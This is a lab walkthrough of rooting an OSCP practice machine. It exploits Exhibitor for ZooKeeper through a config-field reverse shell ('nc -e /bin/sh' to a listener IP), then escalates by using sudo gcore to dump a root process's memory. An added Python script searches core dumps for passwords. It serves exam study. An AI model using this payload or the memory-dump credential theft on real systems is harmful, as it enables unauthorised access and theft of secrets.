
OSCP Prep Machine 003

OSCP RCE ZooKeeper gcore Memory Dump

This is an overview of my methods in rooting a machine from Proving Grounds. Machine names are purposefully omitted to avoid spoilers.

Enumeration

Port Scans (service names are nmap's port-table defaults rather than fingerprints; 8081 turned out to be the Exhibitor web UI, not BlackICE):

PORT     STATE SERVICE
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
631/tcp  open  ipp
2222/tcp open  EtherNetIP-1
8080/tcp open  http-proxy
8081/tcp open  blackice-icecap

The nmap SMB vulnerability scripts flagged only a denial-of-service condition, which offers no foothold and was set aside:

smb-vuln-regsvc-dos: VULNERABLE

Web Exploitation

A web server on port 8081 served the "Exhibitor for ZooKeeper" control panel. Exhibitor's Config editor is reachable without authentication by default, and the java.env field in it is written to disk and sourced as a shell script when Exhibitor (re)starts ZooKeeper, so shell commands placed in that field are executed by the Exhibitor process (CVE-2019-5029, Exhibitor Web UI 1.0.9 through 1.7.1).

Potential Exploit: ExploitDB 48654

Exhibitor RCE

The PoC says to open the Config tab, edit the java.env field, and wrap a reverse shell in $( ) so it is evaluated by the shell that sources the file. Start a listener first (nc -lvnp 4444), then set the field to:

$(/bin/nc -e /bin/sh 192.168.49.133 4444 &)

The trailing & backgrounds nc so the ZooKeeper start script does not hang on it. The -e flag only exists on netcat builds that support it (nc.traditional or ncat); if it is missing, a bash /dev/tcp reverse shell does the same job. After committing the config, Exhibitor restarted ZooKeeper and the reverse shell came back.

Foothold Summary

  1. Scan reveals web server on 8081
  2. Exhibitor for ZooKeeper is vulnerable to RCE
  3. RCE leads to reverse shell

Privilege Escalation

Running basic privesc enumeration commands:

find / -perm -4000 -type f 2>/dev/null   # SUID binaries system-wide
ps aux | grep root                         # processes running as root
sudo -l                                    # sudo rules for the current user

Running sudo -l returned interesting results:

User may run the following commands:
    (ALL) NOPASSWD: /usr/bin/gcore

gcore Memory Dump

gcore (shipped with gdb) attaches to a running process with ptrace and writes its memory to a core file. Ordinarily that is limited to your own processes, but with passwordless sudo it can dump anything, including root-owned daemons, and any secret such a process holds in memory (passwords, keys, tokens) lands in a file you can read.

A "password-store" process was found running as root:

$ ps -ef
root  493  1  0 14:13 ?  00:00:00 /usr/bin/password-store

$ sudo gcore 493

gcore names the dump core.<pid> in the current directory, so core.493 here:

$ strings core*

001 Password: root:
##PASSWORD##

After dumping the process and running strings, the root password was discovered:

$ su root
$ cat proof.txt
# Root flag obtained!
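The strings output above was short enough to read by eye; a real service dump can be gigabytes, and the value is not always next to an obvious label. The following is an added example, not the author's tooling: it does the strings-and-grep step in Python over a constructed byte blob standing in for core.493 (the prompt string and its placeholder value are made up for the demo), adds UTF-16LE runs that strings only shows with -el, and reports each credential-looking run together with the run that follows it, since a prompt or key name and its value are often adjacent allocations. On the target it would be run as `sudo gcore -o /tmp/dump 493` followed by `python3 coregrep.py /tmp/dump.493`.

```python
"""Credential hunting in a gcore memory dump: strings + keyword filter + neighbour."""
import mmap
import re
from typing import List, Tuple

MIN_LEN = 4
# Printable-ASCII runs, as `strings` reports them, and UTF-16LE runs (`strings -el`).
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)
# Labels that usually sit next to a secret in memory; case-insensitive.
CRED_RE = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key|credential", re.I)

# Constructed stand-in for core.493: ELF magic, the process path, the prompt seen
# in the write-up with a placeholder value, binary noise, and a UTF-16 label.
SAMPLE_CORE = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"/usr/bin/password-store\x00\x00\x00"
    + b"001 Password: root:\x00s3cret-example\x00"
    + b"\xde\xad\xbe\xef" * 4
    + "api_key".encode("utf-16-le") + b"\x00\x00"
    + b"libc.so.6\x00"
)


def extract_strings(data) -> List[Tuple[int, str]]:
    """(offset, text) for every printable run, ASCII and UTF-16LE, ordered by offset."""
    runs = [(m.start(), m.group().decode("ascii")) for m in ASCII_RUN.finditer(data)]
    runs += [(m.start(), m.group().decode("utf-16-le")) for m in UTF16_RUN.finditer(data)]
    return sorted(runs)


def find_credentials(data) -> List[Tuple[int, str, str]]:
    """(offset, label_string, following_string) for runs matching CRED_RE.

    The following run is reported because a prompt or key name and its value
    are frequently adjacent in memory, which is exactly the layout seen above.
    """
    runs = extract_strings(data)
    hits = []
    for i, (off, text) in enumerate(runs):
        if CRED_RE.search(text):
            following = runs[i + 1][1] if i + 1 < len(runs) else ""
            hits.append((off, text, following))
    return hits


def scan_core(path: str) -> List[Tuple[int, str, str]]:
    """Scan a core file through mmap so multi-gigabyte dumps are not read into RAM."""
    with open(path, "rb") as f:
        try:
            mm = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
        except ValueError:  # zero-length file
            return []
        with mm:
            return find_credentials(mm)


if __name__ == "__main__":
    import sys
    hits = scan_core(sys.argv[1]) if len(sys.argv) > 1 else find_credentials(SAMPLE_CORE)
    for off, label, following in hits:
        print(f"0x{off:08x}  {label!r}  ->  {following!r}")
```

Expect noise: the binary's own path ("/usr/bin/password-store") matches the keyword list too, which is why the offset and the neighbouring string are printed rather than the label alone.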